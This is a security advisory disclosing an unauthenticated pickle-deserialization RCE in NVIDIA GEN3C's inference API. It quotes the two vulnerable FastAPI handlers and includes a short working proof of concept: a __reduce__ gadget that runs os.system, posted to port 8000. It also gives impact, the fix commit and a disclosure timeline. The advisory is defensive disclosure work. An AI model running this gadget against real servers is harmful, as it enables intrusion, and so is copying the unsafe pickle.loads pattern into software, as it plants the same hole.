NVIDIA GEN3C: Unauthenticated RCE via Pickle Deserialization in the Inference API

Summary

VulnCheck is disclosing CVE-2026-53805, a pickle deserialization vulnerability in NVIDIA GEN3C's inference API that allows for unauthenticated remote code execution. This one did not come from targeting GEN3C. It surfaced from a broad GitHub code search I run across public AI/ML projects for the trivial pattern of a raw HTTP request body passed straight to pickle.loads(); GEN3C was simply one of the hits. That such a search returns hits at all is the point.

GEN3C is NVIDIA's research project for 3D-consistent generation and editing of images and videos, built on a latent diffusion model with camera-controlled inference. It ships a GUI backed by a FastAPI inference server.

Two endpoints in that server, /request-inference and /seed-model, read the raw HTTP request body and pass it directly to pickle.loads(). There is no authentication, no input validation, and no restricted unpickler on either path. Any client that can reach the API port runs arbitrary code as the inference process (CWE-502).

VulnCheck is disclosing this vulnerability in accordance with its coordinated vulnerability disclosure policy.

Affected: all GEN3C revisions up to and including commit 04177ec. The project ships no tagged releases, so deployments are git checkouts of main. NVIDIA patched the deserialization path on main on 2026-06-15 (commit db2ffe1); any checkout from before that commit is still vulnerable.

Reachability and impact: The server listens on port 8000 by default, and the project documents reaching it over an SSH tunnel, so the realistic deployment is a remote GPU host on lab or cloud infrastructure. Anyone with network access to that port, including an attacker with a foothold on the same network, gets code execution with no credentials.

The vulnerability

The API server is gui/api/server.py, a FastAPI application. Two POST handlers take the raw HTTP request body and feed it to pickle. That is the entire bug, and there is nothing more to it.

/request-inference (server.py:106):

@app.post("/request-inference")
async def request_inference(request: Request):
    req: bytes = await request.body()
    req = pickle.loads(req)

/seed-model (server.py:130):

@app.post("/seed-model")
async def seed_model(request: Request):
    req: bytes = await request.body()
    req = pickle.loads(req)

pickle.loads() is pickle's general deserializer: a stream carrying a __reduce__ method runs arbitrary code during deserialization, before the handler ever looks at the decoded object. It is the textbook unsafe-deserialization sink, the first line of every "do not do this in Python" checklist, here wired straight to an unauthenticated HTTP endpoint. Both handlers pass attacker-controlled bytes to it, and the app runs the stock Uvicorn config with no authentication middleware and no TLS.

Exploitation

A single __reduce__ gadget is the whole exploit:

import pickle, os, requests

class RCE:
    def __reduce__(self):
        return (os.system, ("id > /tmp/gen3c_poc",))

requests.post("http://target:8000/request-inference",
              data=pickle.dumps(RCE()))

The command runs during pickle.loads(), before any inference logic. The server returns HTTP 202 ("accepted") and then errors on the unexpected object, but the code has already executed:

$ cat /tmp/gen3c_poc
uid=1000(gen3c) gid=1000(gen3c) groups=1000(gen3c)

Both endpoints are the same bug, copy-pasted.

Note on reproduction

The pickle.loads() call fires the moment the request body is read, ahead of any GPU work, so the vulnerable code path itself does not need a GPU. The server process does require CUDA to start, because it initializes the GEN3C pipeline at boot, so reproducing against a live instance needs an NVIDIA GPU. The vulnerability is confirmed by source review: the pattern is unambiguous (raw body into pickle.loads() with no auth) and the gadget executes before the pipeline is used.

Reachability and threat model

GEN3C is a research project deployed on GPU hardware. The README documents accessing the API through an SSH tunnel (ssh -NL 8000:localhost:8000), which confirms the default port (8000) and the typical deployment: a remote GPU server reached from a workstation.

No authentication. The endpoints authenticate nothing. Whoever reaches the port runs code as the inference process, commonly with access to the host's GPUs, the loaded models, and the data passing through them.
Internal network first. A LAN- or cluster-adjacent attacker, or one with an existing foothold, pivots to code execution on the GPU host with no credentials. The "trusted network" assumption is the only thing between the listener and an attacker.
Fingerprinting. The server returns the generic FastAPI 404 on GET /, so it is not trivially fingerprinted from a banner, but /openapi.json exposes the full schema including the two vulnerable routes.

Network reachability is the boundary here, and on shared lab or cloud GPU infrastructure that boundary is frequently weaker than assumed. Network-level access control is not authentication: once a host on the network is reachable, every unauthenticated service on it is exposed.

Impact

Successful exploitation is unauthenticated remote code execution as the inference process, and from there everything on the box: arbitrary code on the GPU host, the models loaded into it, the data flowing through inference, and a foothold to move laterally across the research or cloud environment. No credentials, no user interaction, one request. The GPU is the expensive part of the deployment; the code guarding it is one pickle.loads().

Remediation

NVIDIA fixed the issue on main on 2026-06-15 (commit db2ffe1, PR #63): the raw pickle.loads() path is replaced by a typed deserializer that enforces a content-type check and an allowed_types allowlist, so a request body can no longer carry an arbitrary pickle gadget. The project ships no tagged releases, so the fix reaches only deployments that pull the latest main; checkouts pinned before that commit stay vulnerable. VulnCheck's own upstream fix (nv-tlabs/GEN3C#62), opened earlier, was not merged and remains open. Operators should update to current main, and where that is not immediately possible, keep the API bound to localhost behind the documented SSH tunnel and not expose port 8000 to any untrusted network.

Timeline

Date	Event
2026-02-10	Vulnerability reported to VulnCheck; CVE requested via the VulnCheck CNA
2026-02-11	VulnCheck initiated coordinated disclosure outreach to the NVIDIA PSIRT (120-day deadline: 2026-06-11)
2026-02-12	NVIDIA PSIRT acknowledged the report
2026-02-13	VulnCheck follow up and notified that the researcher intends to publish a technical report
2026-03-18	VulnCheck requests update
2026-04-23	VulnCheck requests update
2026-04-23	NVIDIA indicated the fix was still in progress
2026-05-12	VulnCheck requests update
2026-06-09	VulnCheck requests final update and indicates intent to disclose on or after 6/11
2026-06-11	VulnCheck submitted a fix upstream (PR #62), replacing pickle with safetensors
2026-06-11	120-day coordinated-disclosure deadline reached, no patch released
2026-06-15	NVIDIA quietly merged its own fix into `main` (PR #63, commit `db2ffe1`), leaving VulnCheck's PR #62 open
2026-06-23	This disclosure

NVIDIA acknowledged the report and indicated a fix was in progress, but nothing landed within the 120-day coordinated-disclosure window. Four days after the deadline, on 2026-06-15, NVIDIA merged its own fix (PR #63) into main without notifying VulnCheck and without merging the patch VulnCheck had proposed in PR #62, which is still open. The fix replaces the unsafe pickle.loads() path with a typed, allowlisted deserializer; the project still ships no tagged release carrying it. Disclosure proceeds per VulnCheck's coordinated disclosure policy.

Takeaways

I did not single out GEN3C: it surfaced from a broad GitHub code search for the literal pattern of an HTTP request body passed straight to pickle.loads(), and that such a search returns hits at all is the lesson.

The bug is the most basic deserialization pattern: an HTTP request body passed directly to pickle.loads() with no authentication. It is a recurring shape in ML/AI tooling, where inference servers expose RPC-style endpoints on GPU hosts and treat the network boundary as sufficient protection. The cost of that assumption is unauthenticated code execution: the moment the listener is reachable by anyone it was not meant to be, a single request is enough. The main branch is now patched, but with no tagged release the fix only reaches deployments that pull it, so operators running GEN3C should update to current main or keep the API bound to localhost behind the documented SSH tunnel and avoid exposing port 8000 to any untrusted network.

About VulnCheck

VulnCheck empowers organizations to transcend the challenges of vulnerability prioritization. Our suite of solutions provides product managers, PSIRT teams, and threat hunters with the tools required for accelerated, high-precision operations and infinite efficiency.

Recognizing the industry-wide necessity for superior data velocity and accuracy, we deliver high-fidelity insights to the market. We remain committed to surfacing critical intelligence on vulnerability exploitation and emerging trends, leveraging our unique dataset to support the practitioner community.

To deepen your understanding of these threats, VulnCheck Exploit & Vulnerability Intelligence provides comprehensive coverage of global threat actors. Register for a demo to explore our intelligence today.

Ready to get Started?